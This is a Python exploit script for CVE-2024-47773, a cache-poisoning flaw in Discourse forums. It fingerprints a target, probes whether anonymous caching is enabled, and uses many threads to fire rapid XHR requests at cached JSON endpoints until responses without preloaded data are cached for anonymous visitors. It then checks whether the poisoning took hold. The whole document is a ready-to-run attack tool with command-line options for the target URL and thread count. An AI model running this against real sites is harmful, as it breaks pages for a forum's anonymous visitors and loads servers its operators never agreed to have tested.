#!/usr/bin/env python3 """ Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning Date: 2024-10-15 Exploit Author: ibrahimsql Github: : https://github.com/ibrahmsql Vendor Homepage: https://discourse.org Software Link: https://github.com/discourse/discourse Version: Discourse < latest (patched) Tested on: Discourse 3.1.x, 3.2.x CVE: CVE-2024-47773 CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L) Description: Discourse anonymous cache poisoning vulnerability allows attackers to poison the cache with responses without preloaded data through multiple XHR requests. This affects only anonymous visitors of the site. Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-47773 """ import requests import sys import argparse import time import threading import json from urllib.parse import urljoin class DiscourseCachePoisoning: def __init__(self, target_url, threads=10, timeout=10): self.target_url = target_url.rstrip('/') self.threads = threads self.timeout = timeout self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest' }) self.poisoned = False def check_target(self): """Check if target is accessible and running Discourse""" try: response = self.session.get(f"{self.target_url}/", timeout=self.timeout) if response.status_code == 200: if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text: return True except Exception as e: print(f"[-] Error checking target: {e}") return False def check_anonymous_cache(self): """Check if anonymous cache is enabled""" try: # Test endpoint that should be cached for anonymous users response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout) # Check cache headers cache_headers = ['cache-control', 'etag', 'last-modified'] has_cache = any(header in response.headers for header in cache_headers) if has_cache: print("[+] Anonymous cache appears to be enabled") return True else: print("[-] Anonymous cache may be disabled") return False except Exception as e: print(f"[-] Error checking cache: {e}") return False def poison_cache_worker(self, endpoint): """Worker function for cache poisoning attempts""" try: # Create session without cookies to simulate anonymous user anon_session = requests.Session() anon_session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest' }) # Make rapid requests to poison cache for i in range(50): response = anon_session.get( f"{self.target_url}{endpoint}", timeout=self.timeout ) # Check if response lacks preloaded data if response.status_code == 200: try: data = response.json() # Check for missing preloaded data indicators if self.is_poisoned_response(data): print(f"[+] Cache poisoning successful on {endpoint}") self.poisoned = True return True except: pass time.sleep(0.1) except Exception as e: pass return False def is_poisoned_response(self, data): """Check if response indicates successful cache poisoning""" # Look for indicators of missing preloaded data indicators = [ # Missing or empty preloaded data not data.get('preloaded', True), data.get('preloaded') == {}, # Missing expected fields 'categories' in data and not data['categories'], 'topics' in data and not data['topics'], # Error indicators data.get('error') is not None, data.get('errors') is not None ] return any(indicators) def test_cache_poisoning(self): """Test cache poisoning on multiple endpoints""" print("[*] Testing cache poisoning vulnerability...") # Target endpoints that are commonly cached endpoints = [ '/categories.json', '/latest.json', '/top.json', '/c/general.json', '/site.json', '/site/basic-info.json' ] threads = [] for endpoint in endpoints: print(f"[*] Testing endpoint: {endpoint}") # Create multiple threads to poison cache for i in range(self.threads): thread = threading.Thread( target=self.poison_cache_worker, args=(endpoint,) ) threads.append(thread) thread.start() # Wait for threads to complete for thread in threads: thread.join(timeout=5) if self.poisoned: break time.sleep(1) return self.poisoned def verify_poisoning(self): """Verify if cache poisoning was successful""" print("[*] Verifying cache poisoning...") # Test with fresh anonymous session verify_session = requests.Session() verify_session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' }) try: response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout) if response.status_code == 200: try: data = response.json() if self.is_poisoned_response(data): print("[+] Cache poisoning verified - anonymous users affected") return True else: print("[-] Cache poisoning not verified") except: print("[-] Unable to parse response") else: print(f"[-] Unexpected response code: {response.status_code}") except Exception as e: print(f"[-] Error verifying poisoning: {e}") return False def exploit(self): """Main exploit function""" print(f"[*] Testing Discourse Cache Poisoning (CVE-2024-47773)") print(f"[*] Target: {self.target_url}") if not self.check_target(): print("[-] Target is not accessible or not running Discourse") return False print("[+] Target confirmed as Discourse instance") if not self.check_anonymous_cache(): print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)") print("[*] Continuing with exploit attempt...") success = self.test_cache_poisoning() if success: print("[+] Cache poisoning attack successful!") self.verify_poisoning() print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data") print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE") return True else: print("[-] Cache poisoning attack failed") print("[*] Target may be patched or cache disabled") return False def main(): parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)') parser.add_argument('-u', '--url', required=True, help='Target Discourse URL') parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)') parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)') args = parser.parse_args() exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout) try: success = exploit.exploit() sys.exit(0 if success else 1) except KeyboardInterrupt: print("\n[-] Exploit interrupted by user") sys.exit(1) except Exception as e: print(f"[-] Exploit failed: {e}") sys.exit(1) if __name__ == '__main__': main()